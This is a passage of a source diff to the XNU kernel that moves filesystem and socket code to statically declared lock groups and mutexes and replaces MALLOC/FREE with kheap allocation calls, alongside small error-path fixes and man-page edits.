fileproc *), M_TEMP, M_WAITOK); + fileproc_l = kheap_alloc(KHEAP_TEMP, + newfds * sizeof(struct fileproc *), Z_WAITOK); if (fileproc_l == NULL) { error = ENOMEM; goto discard; @@ -2222,9 +2221,8 @@ unp_externalize(struct mbuf *rights) } discard: - if (fileproc_l != NULL) { - FREE(fileproc_l, M_TEMP); - } + kheap_free(KHEAP_TEMP, fileproc_l, + newfds * sizeof(struct fileproc *)); if (error) { for (i = 0; i < newfds; i++) { unp_discard(*rp, p); @@ -2240,20 +2238,6 @@ unp_init(void) _CASSERT(UIPC_MAX_CMSG_FD >= (MCLBYTES / sizeof(int))); LIST_INIT(&unp_dhead); LIST_INIT(&unp_shead); - - /* - * allocate lock group attribute and group for udp pcb mutexes - */ - unp_mtx_grp_attr = lck_grp_attr_alloc_init(); - - unp_mtx_grp = lck_grp_alloc_init("unp_list", unp_mtx_grp_attr); - - unp_mtx_attr = lck_attr_alloc_init(); - - lck_mtx_init(&uipc_lock, unp_mtx_grp, unp_mtx_attr); - lck_rw_init(&unp_list_mtx, unp_mtx_grp, unp_mtx_attr); - lck_mtx_init(&unp_disconnect_lock, unp_mtx_grp, unp_mtx_attr); - lck_mtx_init(&unp_connect_lock, unp_mtx_grp, unp_mtx_attr); } #ifndef MIN @@ -2482,8 +2466,8 @@ unp_gc(void) * * 91/09/19, bsy@cs.cmu.edu */ - MALLOC(extra_ref, struct fileglob **, nfiles * sizeof(struct fileglob *), - M_TEMP, M_WAITOK); + size_t extra_ref_size = nfiles * sizeof(struct fileglob *); + extra_ref = kheap_alloc(KHEAP_TEMP, extra_ref_size, Z_WAITOK); if (extra_ref == NULL) { goto bail; } @@ -2539,7 +2523,8 @@ unp_gc(void) fg_drop(PROC_NULL, *fpp); } - FREE(extra_ref, M_TEMP); + kheap_free(KHEAP_TEMP, extra_ref, extra_ref_size); + bail: lck_mtx_lock(&uipc_lock); unp_gcing = 0; @@ -2708,7 +2693,7 @@ unp_unlock(struct socket *so, int refcount, void * lr) lck_mtx_unlock(mutex_held); - lck_mtx_destroy(&unp->unp_mtx, unp_mtx_grp); + lck_mtx_destroy(&unp->unp_mtx, &unp_mtx_grp); zfree(unp_zone, unp); unp_gc(); diff --git a/bsd/kern/vsock_domain.c b/bsd/kern/vsock_domain.c index ae118349d..2f3e69a71 100644 --- a/bsd/kern/vsock_domain.c +++ b/bsd/kern/vsock_domain.c @@ -50,6 +50,7 @@ static struct vsock_transport * _Atomic the_vsock_transport = NULL; static ZONE_DECLARE(vsockpcb_zone, "vsockpcbzone", sizeof(struct vsockpcb), ZC_NONE); +static LCK_GRP_DECLARE(vsock_lock_grp, "vsock"); static struct vsockpcbinfo vsockinfo; static uint32_t vsock_sendspace = VSOCK_MAX_PACKET_SIZE * 8; @@ -70,7 +71,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst) struct vsockpcb *match = NULL; struct vsockpcb *pcb = NULL; - lck_rw_lock_shared(vsockinfo.bound_lock); + lck_rw_lock_shared(&vsockinfo.bound_lock); LIST_FOREACH(pcb, &vsockinfo.bound, bound) { // Source cid and port must match. Only destination port must match. (Allows for a changing CID during migration) socket_lock(pcb->so, 1); @@ -89,7 +90,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst) socket_lock(match->so, 1); preferred = match; } - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return preferred; } @@ -111,7 +112,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo struct vsockpcb *pcb_match = NULL; socket_unlock(pcb->so, 0); - lck_rw_lock_exclusive(vsockinfo.bound_lock); + lck_rw_lock_exclusive(&vsockinfo.bound_lock); LIST_FOREACH(pcb_match, &vsockinfo.bound, bound) { socket_lock(pcb_match->so, 1); if (pcb == pcb_match || @@ -130,7 +131,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo pcb->remote_address = (struct vsock_address) { .cid = remote_cid, .port = remote_port }; LIST_INSERT_HEAD(&vsockinfo.bound, pcb, bound); } - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return taken ? EADDRINUSE : 0; } @@ -225,10 +226,10 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked) if (!is_locked) { socket_unlock(pcb->so, 0); - lck_rw_lock_exclusive(vsockinfo.bound_lock); + lck_rw_lock_exclusive(&vsockinfo.bound_lock); socket_lock(pcb->so, 0); if (!pcb->bound.le_prev) { - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return; } } @@ -238,7 +239,7 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked) pcb->bound.le_prev = NULL; if (!is_locked) { - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); } } @@ -250,12 +251,12 @@ vsock_new_sockaddr(struct vsock_address *address) } struct sockaddr_vm *addr; - MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME, M_WAITOK); + MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME, + M_WAITOK | M_ZERO); if (!addr) { return NULL; } - bzero(addr, sizeof(*addr)); addr->svm_len = sizeof(*addr); addr->svm_family = AF_VSOCK; addr->svm_port = address->port; @@ -629,7 +630,7 @@ vsock_reset_transport(struct vsock_transport *transport) struct vsockpcb *pcb = NULL; struct vsockpcb *tmp_pcb = NULL; - lck_rw_lock_exclusive(vsockinfo.bound_lock); + lck_rw_lock_exclusive(&vsockinfo.bound_lock); LIST_FOREACH_SAFE(pcb, &vsockinfo.bound, bound, tmp_pcb) { // Disconnect this transport's sockets. Listen and bind sockets must stay alive. socket_lock(pcb->so, 1); @@ -641,7 +642,7 @@ vsock_reset_transport(struct vsock_transport *transport) } socket_unlock(pcb->so, 1); } - lck_rw_done(vsockinfo.bound_lock); + lck_rw_done(&vsockinfo.bound_lock); return error; } @@ -722,10 +723,10 @@ vsock_pcblist SYSCTL_HANDLER_ARGS } // Get the generation count and the count of all vsock sockets. - lck_rw_lock_shared(vsockinfo.all_lock); + lck_rw_lock_shared(&vsockinfo.all_lock); uint64_t n = vsockinfo.all_pcb_count; vsock_gen_t gen_count = vsockinfo.vsock_gencnt; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); const size_t xpcb_len = sizeof(struct xvsockpcb); struct xvsockpgen xvg; @@ -758,7 +759,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS return 0; } - lck_rw_lock_shared(vsockinfo.all_lock); + lck_rw_lock_shared(&vsockinfo.all_lock); n = 0; struct vsockpcb *pcb = NULL; @@ -803,7 +804,7 @@ vsock_pcblist SYSCTL_HANDLER_ARGS // Update the generation count to match the sockets being returned. gen_count = vsockinfo.vsock_gencnt; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); if (!error) { /* @@ -886,11 +887,11 @@ vsock_attach(struct socket *so, int proto, struct proc *p) } // Add to the list of all vsock sockets. - lck_rw_lock_exclusive(vsockinfo.all_lock); + lck_rw_lock_exclusive(&vsockinfo.all_lock); TAILQ_INSERT_TAIL(&vsockinfo.all, pcb, all); vsockinfo.all_pcb_count++; pcb->vsock_gencnt = ++vsockinfo.vsock_gencnt; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); return 0; } @@ -950,13 +951,13 @@ vsock_detach(struct socket *so) } // Remove from the list of all vsock sockets. - lck_rw_lock_exclusive(vsockinfo.all_lock); + lck_rw_lock_exclusive(&vsockinfo.all_lock); TAILQ_REMOVE(&vsockinfo.all, pcb, all); pcb->all.tqe_next = NULL; pcb->all.tqe_prev = NULL; vsockinfo.all_pcb_count--; vsockinfo.vsock_gencnt++; - lck_rw_done(vsockinfo.all_lock); + lck_rw_done(&vsockinfo.all_lock); // Deallocate any resources. zfree(vsockpcb_zone, pcb); @@ -1380,15 +1381,9 @@ vsock_init(struct protosw *pp, struct domain *dp) } // Setup VSock protocol info struct. - vsockinfo.vsock_lock_grp_attr = lck_grp_attr_alloc_init(); - vsockinfo.vsock_lock_grp = lck_grp_alloc_init("vsock", vsockinfo.vsock_lock_grp_attr); - vsockinfo.vsock_lock_attr = lck_attr_alloc_init(); - if ((vsockinfo.all_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL || - (vsockinfo.bound_lock = lck_rw_alloc_init(vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr)) == NULL) { - panic("%s: unable to allocate PCB lock\n", __func__); - /* NOTREACHED */ - } - lck_mtx_init(&vsockinfo.port_lock, vsockinfo.vsock_lock_grp, vsockinfo.vsock_lock_attr); + lck_rw_init(&vsockinfo.all_lock, &vsock_lock_grp, LCK_ATTR_NULL); + lck_rw_init(&vsockinfo.bound_lock, &vsock_lock_grp, LCK_ATTR_NULL); + lck_mtx_init(&vsockinfo.port_lock, &vsock_lock_grp, LCK_ATTR_NULL); TAILQ_INIT(&vsockinfo.all); LIST_INIT(&vsockinfo.bound); vsockinfo.last_port = VMADDR_PORT_ANY; diff --git a/bsd/man/man2/clonefile.2 b/bsd/man/man2/clonefile.2 index 114321e0d..56b8d0a92 100644 --- a/bsd/man/man2/clonefile.2 +++ b/bsd/man/man2/clonefile.2 @@ -44,7 +44,7 @@ The cloned file .Fa dst shares its data blocks with the .Fa src -file but has its own copy of attributes, extended attributes and ACL's which are identical to +file but has its own copy of attributes and extended attributes which are identical to those of the named file .Fa src with the exceptions listed below diff --git a/bsd/man/man2/mount.2 b/bsd/man/man2/mount.2 index 586707fa6..98e6e25bb 100644 --- a/bsd/man/man2/mount.2 +++ b/bsd/man/man2/mount.2 @@ -208,6 +208,8 @@ may fail with one of the following errors: The caller is not the super-user, and the .Nm mount() was not done by the user. +.It Bq Er EPERM +A system policy denied the operation. .It Bq Er ENOTDIR A component of the path is not a directory. .It Bq Er EINVAL diff --git a/bsd/miscfs/bindfs/bind_subr.c b/bsd/miscfs/bindfs/bind_subr.c index 58b67705e..2b4500f04 100644 --- a/bsd/miscfs/bindfs/bind_subr.c +++ b/bsd/miscfs/bindfs/bind_subr.c @@ -82,10 +82,8 @@ #define BIND_NHASH(vp) (&bind_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & bind_hash_mask]) static LIST_HEAD(bind_node_hashhead, bind_node) * bind_node_hashtbl; -static lck_mtx_t bind_hashmtx; -static lck_attr_t * bind_hashlck_attr; -static lck_grp_t * bind_hashlck_grp; -static lck_grp_attr_t * bind_hashlck_grp_attr; +static LCK_GRP_DECLARE(bind_hashlck_grp, "com.apple.filesystems.bindfs"); +static LCK_MTX_DECLARE(bind_hashmtx, &bind_hashlck_grp); static u_long bind_hash_mask; /* xnu doesn't have hashes built into vnodes. This mimics what freebsd does @@ -94,28 +92,6 @@ static int vnsz2log = 9; static int bind_hashins(struct mount *, struct bind_node *, struct vnode **); -int -bindfs_init_lck(lck_mtx_t * lck) -{ - int error = 1; - if (lck && bind_hashlck_grp && bind_hashlck_attr) { - lck_mtx_init(lck, bind_hashlck_grp, bind_hashlck_attr); - error = 0; - } - return error; -} - -int -bindfs_destroy_lck(lck_mtx_t * lck) -{ - int error = 1; - if (lck && bind_hashlck_grp) { - lck_mtx_destroy(lck, bind_hashlck_grp); - error = 0; - } - return error; -} - /* * Initialise cache headers */ @@ -124,43 +100,15 @@ bindfs_init(__unused struct vfsconf * vfsp) { BINDFSDEBUG("%s\n", __FUNCTION__); - /* assuming for now that this happens immediately and by default after fs - * installation */ - bind_hashlck_grp_attr = lck_grp_attr_alloc_init(); - if (bind_hashlck_grp_attr == NULL) { - goto error; - } - bind_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.bindfs", bind_hashlck_grp_attr); - if (bind_hashlck_grp == NULL) { - goto error; - } - bind_hashlck_attr = lck_attr_alloc_init(); - if (bind_hashlck_attr == NULL) { - goto error; - } - bind_node_hashtbl = hashinit(BIND_HASH_SIZE, M_TEMP, &bind_hash_mask); if (bind_node_hashtbl == NULL) { goto error; } - lck_mtx_init(&bind_hashmtx, bind_hashlck_grp, bind_hashlck_attr); BINDFSDEBUG("%s finished\n", __FUNCTION__); return 0; error: printf("BINDFS: failed to initialize globals\n"); - if (bind_hashlck_grp_attr) { - lck_grp_attr_free(bind_hashlck_grp_attr); - bind_hashlck_grp_attr = NULL; - } - if (bind_hashlck_grp) { - lck_grp_free(bind_hashlck_grp); - bind_hashlck_grp = NULL; - } - if (bind_hashlck_attr) { - lck_attr_free(bind_hashlck_attr); - bind_hashlck_attr = NULL; - } return KERN_FAILURE; } @@ -169,20 +117,7 @@ bindfs_destroy(void) { /* This gets called when the fs is uninstalled, there wasn't an exact * equivalent in vfsops */ - lck_mtx_destroy(&bind_hashmtx, bind_hashlck_grp); hashdestroy(bind_node_hashtbl, M_TEMP, bind_hash_mask); - if (bind_hashlck_grp_attr) { - lck_grp_attr_free(bind_hashlck_grp_attr); - bind_hashlck_grp_attr = NULL; - } - if (bind_hashlck_grp) { - lck_grp_free(bind_hashlck_grp); - bind_hashlck_grp = NULL; - } - if (bind_hashlck_attr) { - lck_attr_free(bind_hashlck_attr); - bind_hashlck_attr = NULL; - } return 0; } diff --git a/bsd/miscfs/bindfs/bind_vnops.c b/bsd/miscfs/bindfs/bind_vnops.c index 2290bd890..726337c1e 100644 --- a/bsd/miscfs/bindfs/bind_vnops.c +++ b/bsd/miscfs/bindfs/bind_vnops.c @@ -246,11 +246,10 @@ notdot: if (error == 0) { *ap->a_vpp = vp; } - } - - /* if we got lvp, drop the iocount from VNOP_LOOKUP */ - if (lvp != NULL) { - vnode_put(lvp); + /* if we got lvp, drop the iocount from VNOP_LOOKUP */ + if (lvp != NULL) { + vnode_put(lvp); + } } return error; @@ -334,7 +333,7 @@ bindfs_readdir(struct vnop_readdir_args * ap) struct dirent *dep; size_t bytesread; bufsize = 3 * MIN((user_size_t)uio_resid(uio), 87371u) / 8; - MALLOC(bufptr, void *, bufsize, M_TEMP, M_WAITOK); + bufptr = kheap_alloc(KHEAP_TEMP, bufsize, Z_WAITOK); if (bufptr == NULL) { return ENOMEM; } @@ -377,7 +376,7 @@ bindfs_readdir(struct vnop_readdir_args * ap) uio_setoffset(uio, uio_offset(auio)); } uio_free(auio); - FREE(bufptr, M_TEMP); + kheap_free(KHEAP_TEMP, bufptr, bufsize); } else { error = VNOP_READDIR(lvp, ap->a_uio, ap->a_flags, ap->a_eofflag, ap->a_numdirent, ap->a_context); vnode_put(lvp); diff --git a/bsd/miscfs/bindfs/bindfs.h b/bsd/miscfs/bindfs/bindfs.h index c50a91f4d..c3bebc8a4 100644 --- a/bsd/miscfs/bindfs/bindfs.h +++ b/bsd/miscfs/bindfs/bindfs.h @@ -127,8 +127,6 @@ struct vnodeop_desc_fake { __BEGIN_DECLS int bindfs_init(struct vfsconf * vfsp); -int bindfs_init_lck(lck_mtx_t * lck); -int bindfs_destroy_lck(lck_mtx_t * lck); int bindfs_destroy(void); int bind_nodeget( struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root); diff --git a/bsd/miscfs/devfs/devfs_fdesc_support.c b/bsd/miscfs/devfs/devfs_fdesc_support.c index 9c861796f..c615ea620 100644 --- a/bsd/miscfs/devfs/devfs_fdesc_support.c +++ b/bsd/miscfs/devfs/devfs_fdesc_support.c @@ -113,8 +113,8 @@ u_long fdhash; static int fdesc_attr(int fd, struct vnode_attr *vap, vfs_context_t a_context); -lck_mtx_t fdesc_mtx; -lck_grp_t *fdesc_lckgrp; +static LCK_GRP_DECLARE(fdesc_lckgrp, "fdesc"); +static LCK_MTX_DECLARE(fdesc_mtx, &fdesc_lckgrp); static void fdesc_lock(void) @@ -141,8 +141,6 @@ devfs_fdesc_init() /* XXX Make sure you have the right path... */ fdhashtbl = hashinit(NFDCACHE, M_CACHE, &fdhash); - fdesc_lckgrp = lck_grp_alloc_init("fdesc", NULL); - lck_mtx_init(&fdesc_mtx, fdesc_lckgrp, NULL); DEVFS_LOCK(); dev_add_entry("fd", rootdir, DEV_DEVFD, NULL, NULL, NULL, &direntp); @@ -311,7 +309,7 @@ devfs_devfd_lookup(struct vnop_lookup_args *ap) *vpp = dvp; if ((error = vnode_get(dvp))) { - return error; + goto bad; } return 0; } diff --git a/bsd/miscfs/devfs/devfs_tree.c b/bsd/miscfs/devfs/devfs_tree.c index 21a0ac5c0..5acacb6ea 100644 --- a/bsd/miscfs/devfs/devfs_tree.c +++ b/bsd/miscfs/devfs/devfs_tree.c @@ -145,11 +145,9 @@ static devdirent_t *devfs_make_node_internal(dev_t, devfstype_t type, uid_t, gid int (*clone)(dev_t dev, int action), const char *fmt, va_list ap); -lck_grp_t * devfs_lck_grp; -lck_grp_attr_t * devfs_lck_grp_attr; -lck_attr_t * devfs_lck_attr; -lck_mtx_t devfs_mutex; -lck_mtx_t devfs_attr_mutex; +static LCK_GRP_DECLARE(devfs_lck_grp, "devfs_lock"); +LCK_MTX_DECLARE(devfs_mutex, &devfs_lck_grp); +LCK_MTX_DECLARE(devfs_attr_mutex, &devfs_lck_grp); os_refgrp_decl(static, devfs_refgrp, "devfs", NULL); @@ -183,14 +181,6 @@ devfs_sinit(void) { int error; - devfs_lck_grp_attr = lck_grp_attr_alloc_init(); - devfs_lck_grp = lck_grp_alloc_init("devfs_lock", devfs_lck_grp_attr); - - devfs_lck_attr = lck_attr_alloc_init(); - - lck_mtx_init(&devfs_mutex, devfs_lck_grp, devfs_lck_attr); - lck_mtx_init(&devfs_attr_mutex, devfs_lck_grp, devfs_lck_attr); - DEVFS_LOCK(); error = dev_add_entry("root", NULL, DEV_DIR, NULL, NULL, NULL, &dev_root); DEVFS_UNLOCK(); diff --git a/bsd/miscfs/devfs/devfs_vfsops.c b/bsd/miscfs/devfs/devfs_vfsops.c index f01b26873..d5426b182 100644 --- a/bsd/miscfs/devfs/devfs_vfsops.c +++ b/bsd/miscfs/devfs/devfs_vfsops.c @@ -495,7 +495,7 @@ devfs_kernel_mount(char * mntname) vfs_context_t ctx = vfs_context_kernel(); char fsname[] = "devfs"; - error = kernel_mount(fsname, NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH, ctx); + error = kernel_mount(fsname, NULLVP, NULLVP, mntname, NULL, 0, MNT_DONTBROWSE, KERNEL_MOUNT_NOAUTH | KERNEL_MOUNT_DEVFS, ctx); if (error) { printf("devfs_kernel_mount: kernel_mount failed: %d\n", error); return error; diff --git a/bsd/miscfs/mockfs/mockfs.h b/bsd/miscfs/mockfs/mockfs.h index dab2af734..07c91ffaf 100644 --- a/bsd/miscfs/mockfs/mockfs.h +++ b/bsd/miscfs/mockfs/mockfs.h @@ -54,10 +54,6 @@ * For the moment, mockfs is not marked in vfs_conf.c as being threadsafe. */ -extern lck_attr_t * mockfs_mtx_attr; -extern lck_grp_attr_t * mockfs_grp_attr; -extern lck_grp_t * mockfs_mtx_grp; - struct mockfs_mount { lck_mtx_t mockfs_mnt_mtx; /* Mount-wide (and tree-wide) mutex */ mockfs_fsnode_t mockfs_root; /* Root of the node tree */ diff --git a/bsd/miscfs/mockfs/mockfs_vfsops.c b/bsd/miscfs/mockfs/mockfs_vfsops.c index 4a524a054..588fa7aad 100644 --- a/bsd/miscfs/mockfs/mockfs_vfsops.c +++ b/bsd/miscfs/mockfs/mockfs_vfsops.c @@ -39,9 +39,7 @@ #include #include -lck_attr_t * mockfs_mtx_attr = (lck_attr_t *) 0; -lck_grp_attr_t * mockfs_grp_attr = (lck_grp_attr_t *) 0; -lck_grp_t * mockfs_mtx_grp = (lck_grp_t *) 0; +static LCK_GRP_DECLARE(mockfs_mtx_grp, "mockfs-mutex"); int mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx); @@ -111,7 +109,7 @@ mockfs_mountroot(mount_t mp, vnode_t rvp, __unused vfs_context_t ctx) } } - lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp, mockfs_mtx_attr); + lck_mtx_init(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp, LCK_ATTR_NULL); /* * All of the needed nodes/structures have been set up; now we just need to establish the relationships @@ -140,7 +138,7 @@ done: mockfs_fsnode_destroy(root_fsnode); } if (mockfs_mount_data) { - lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, mockfs_mtx_grp); + lck_mtx_destroy(&mockfs_mount_data->mockfs_mnt_mtx, &mockfs_mtx_grp); FREE(mockfs_mount_data, M_TEMP); } } @@ -193,7 +191,7 @@ mockfs_unmount(struct mount *mp, int mntflags, __unused vfs_context_t ctx) panic("mockfs_unmount: Failed to destroy the fsnode tree"); } - lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, mockfs_mtx_grp); + lck_mtx_destroy(&mockfs_mnt->mockfs_mnt_mtx, &mockfs_mtx_grp); FREE(mockfs_mnt, M_TEMP); mp->mnt_data = NULL; @@ -227,28 +225,9 @@ mockfs_sync(__unused struct mount *mp, __unused int waitfor, __unused vfs_contex return 0; } -/* - * mockfs_init: - * Run once (during VFS initialization); takes care of generic mockfs initialization (which for now, means - * global lock information). - * - * Returns 0 on success, or an error. - */ int mockfs_init(__unused struct vfsconf * vfsc) { - mockfs_mtx_attr = lck_attr_alloc_init(); - mockfs_grp_attr = lck_grp_attr_alloc_init(); - mockfs_mtx_grp = lck_grp_alloc_init("mockfs-mutex", mockfs_grp_attr); - - /* - * If we've failed to allocate this early in boot, something is horrendously wrong; it should be fine to - * panic (for now). - */ - if (!mockfs_mtx_attr || !mockfs_grp_attr || !mockfs_mtx_grp) { - panic("mockfs_init failed to allocate lock information"); - } - return 0; } diff --git a/bsd/miscfs/nullfs/null_subr.c b/bsd/miscfs/nullfs/null_subr.c index caffb546a..4561bec50 100644 --- a/bsd/miscfs/nullfs/null_subr.c +++ b/bsd/miscfs/nullfs/null_subr.c @@ -82,10 +82,8 @@ #define NULL_NHASH(vp) (&null_node_hashtbl[((((uintptr_t)vp) >> vnsz2log) + (uintptr_t)vnode_mount(vp)) & null_hash_mask]) static LIST_HEAD(null_node_hashhead, null_node) * null_node_hashtbl; -static lck_mtx_t null_hashmtx; -static lck_attr_t * null_hashlck_attr; -static lck_grp_t * null_hashlck_grp; -static lck_grp_attr_t * null_hashlck_grp_attr; +static LCK_GRP_DECLARE(null_hashlck_grp, "com.apple.filesystems.nullfs"); +static LCK_MTX_DECLARE(null_hashmtx, &null_hashlck_grp); static u_long null_hash_mask; /* os x doesn't have hashes built into vnode. gonna try doing what freebsd does @@ -97,26 +95,16 @@ static int vnsz2log = 9; static int null_hashins(struct mount *, struct null_node *, struct vnode **); -int +void nullfs_init_lck(lck_mtx_t * lck) { - int error = 1; - if (lck && null_hashlck_grp && null_hashlck_attr) { - lck_mtx_init(lck, null_hashlck_grp, null_hashlck_attr); - error = 0; - } - return error; + lck_mtx_init(lck, &null_hashlck_grp, LCK_ATTR_NULL); } -int +void nullfs_destroy_lck(lck_mtx_t * lck) { - int error = 1; - if (lck && null_hashlck_grp) { - lck_mtx_destroy(lck, null_hashlck_grp); - error = 0; - } - return error; + lck_mtx_destroy(lck, &null_hashlck_grp); } /* @@ -126,62 +114,17 @@ int nullfs_init(__unused struct vfsconf * vfsp) { NULLFSDEBUG("%s\n", __FUNCTION__); - - /* assuming for now that this happens immediately and by default after fs - * installation */ - null_hashlck_grp_attr = lck_grp_attr_alloc_init(); - if (null_hashlck_grp_attr == NULL) { - goto error; - } - null_hashlck_grp = lck_grp_alloc_init("com.apple.filesystems.nullfs", null_hashlck_grp_attr); - if (null_hashlck_grp == NULL) { - goto error; - } - null_hashlck_attr = lck_attr_alloc_init(); - if (null_hashlck_attr == NULL) { - goto error; - } - - lck_mtx_init(&null_hashmtx, null_hashlck_grp, null_hashlck_attr); null_node_hashtbl = hashinit(NULL_HASH_SIZE, M_TEMP, &null_hash_mask); NULLFSDEBUG("%s finished\n", __FUNCTION__); return 0; -error: - printf("NULLFS: failed to get lock element\n"); - if (null_hashlck_grp_attr) { - lck_grp_attr_free(null_hashlck_grp_attr); - null_hashlck_grp_attr = NULL; - } - if (null_hashlck_grp) { - lck_grp_free(null_hashlck_grp); - null_hashlck_grp = NULL; - } - if (null_hashlck_attr) { - lck_attr_free(null_hashlck_attr); - null_hashlck_attr = NULL; - } - return KERN_FAILURE; } int -nullfs_uninit() +nullfs_uninit(void) { /* This gets called when the fs is uninstalled, there wasn't an exact * equivalent in vfsops */ - lck_mtx_destroy(&null_hashmtx, null_hashlck_grp); hashdestroy(null_node_hashtbl, M_TEMP, null_hash_mask); - if (null_hashlck_grp_attr) { - lck_grp_attr_free(null_hashlck_grp_attr); - null_hashlck_grp_attr = NULL; - } - if (null_hashlck_grp) { - lck_grp_free(null_hashlck_grp); - null_hashlck_grp = NULL; - } - if (null_hashlck_attr) { - lck_attr_free(null_hashlck_attr); - null_hashlck_attr = NULL; - } return 0; } diff --git a/bsd/miscfs/nullfs/null_vfsops.c b/bsd/miscfs/nullfs/null_vfsops.c index b09395429..c0f5ac6e7 100644 --- a/bsd/miscfs/nullfs/null_vfsops.c +++ b/bsd/miscfs/nullfs/null_vfsops.c @@ -221,10 +221,7 @@ nullfs_mount(struct mount * mp, __unused vnode_t devvp, user_addr_t user_data, v vnode_ref(vp); vnode_put(vp); - error = nullfs_init_lck(&xmp->nullm_lock); - if (error) { - goto error; - } + nullfs_init_lck(&xmp->nullm_lock); xmp->nullm_rootvp = vp; diff --git a/bsd/miscfs/nullfs/null_vnops.c b/bsd/miscfs/nullfs/null_vnops.c index a351309c3..176f84e74 100644 --- a/bsd/miscfs/nullfs/null_vnops.c +++ b/bsd/miscfs/nullfs/null_vnops.c @@ -403,6 +403,9 @@ null_get_lowerparent(vnode_t lvp, vnode_t * dvpp, vfs_context_t ctx) error = vnode_getattr(lvp, &va, ctx); if (error || !VATTR_IS_SUPPORTED(&va, va_parentid)) { + if (!error) { + error = ENOTSUP; + } goto end; } @@ -605,11 +608,10 @@ notdot: if (error == 0) { *ap->a_vpp = vp; } - } - - /* if we got lvp, drop the iocount from VNOP_LOOKUP */ - if (lvp != NULL) { - vnode_put(lvp); + /* if we got lvp, drop the iocount from VNOP_LOOKUP */ + if (lvp != NULL) { + vnode_put(lvp); + } } nullfs_cleanup_patched_context(null_mp, ectx); diff --git a/bsd/miscfs/nullfs/nullfs.h b/bsd/miscfs/nullfs/nullfs.h index 4dd8d50f6..0ed22771f 100644 --- a/bsd/miscfs/nullfs/nullfs.h +++ b/bsd/miscfs/nullfs/nullfs.h @@ -139,8 +139,8 @@ struct vnodeop_desc_fake { __BEGIN_DECLS int nullfs_init(struct vfsconf * vfsp); -int nullfs_init_lck(lck_mtx_t * lck); -int nullfs_destroy_lck(lck_mtx_t * lck); +void nullfs_init_lck(lck_mtx_t * lck); +void nullfs_destroy_lck(lck_mtx_t * lck); int nullfs_uninit(void); int null_nodeget( struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root); diff --git a/bsd/miscfs/routefs/routefs_ops.c b/bsd/miscfs/routefs/routefs_ops.c index 42e082203..a4f8fc170 100644 --- a/bsd/miscfs/routefs/routefs_ops.c +++ b/bsd/miscfs/routefs/routefs_ops.c @@ -65,25 +65,16 @@ static int routefserr_lookup(__unused struct vnop_lookup_args * args); static int routefserr_setlabel(__unused struct vnop_setlabel_args * args); -lck_grp_t * routefs_lck_grp; -lck_grp_attr_t * routefs_lck_grp_attr; -lck_attr_t * routefs_lck_attr; -lck_mtx_t routefs_mutex; +LCK_GRP_DECLARE(routefs_lck_grp, "routefs_lock"); +LCK_MTX_DECLARE(routefs_mutex, &routefs_lck_grp);; #define ROUTEFS_LOCK() lck_mtx_lock(&routefs_mutex) #define ROUTEFS_UNLOCK() lck_mtx_unlock(&routefs_mutex) -static int _lock_inited = 0; static boolean_t _fs_alreadyMounted = FALSE; /* atleast a mount of this filesystem is present */ static int routefs_init(__unused struct vfsconf *vfsp) { - routefs_lck_grp_attr = lck_grp_attr_alloc_init(); - routefs_lck_grp = lck_grp_alloc_init("routefs_lock", routefs_lck_grp_attr); - routefs_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&routefs_mutex, routefs_lck_grp, routefs_lck_attr); - _lock_inited = 1; - return 0; } diff --git a/bsd/miscfs/specfs/spec_vnops.c b/bsd/miscfs/specfs/spec_vnops.c index eaa194215..cb15e0146 100644 --- a/bsd/miscfs/specfs/spec_vnops.c +++ b/bsd/miscfs/specfs/spec_vnops.c @@ -100,6 +100,10 @@ #include #include +#if CONFIG_IO_COMPRESSION_STATS +#include +#endif /* CONFIG_IO_COMPRESSION_STATS */ + /* XXX following three prototypes should be in a header file somewhere */ extern dev_t chrtoblk(dev_t dev); extern boolean_t iskmemdev(dev_t dev); @@ -943,9 +947,7 @@ SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_tier3_io_period_ssd_msecs, CTLFLAG_ SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &lowpri_throttle_enabled, 0, ""); -static lck_grp_t *throttle_lock_grp; -static lck_attr_t *throttle_lock_attr; -static lck_grp_attr_t *throttle_lock_grp_attr; +static LCK_GRP_DECLARE(throttle_lock_grp, "throttle I/O"); /* @@ -997,7 +999,7 @@ throttle_info_rel(struct _throttle_io_info_t *info) if ((info->throttle_refcnt == 0) && (info->throttle_alloc)) { DEBUG_ALLOC_THROTTLE_INFO("Freeing info = %p\n", info); 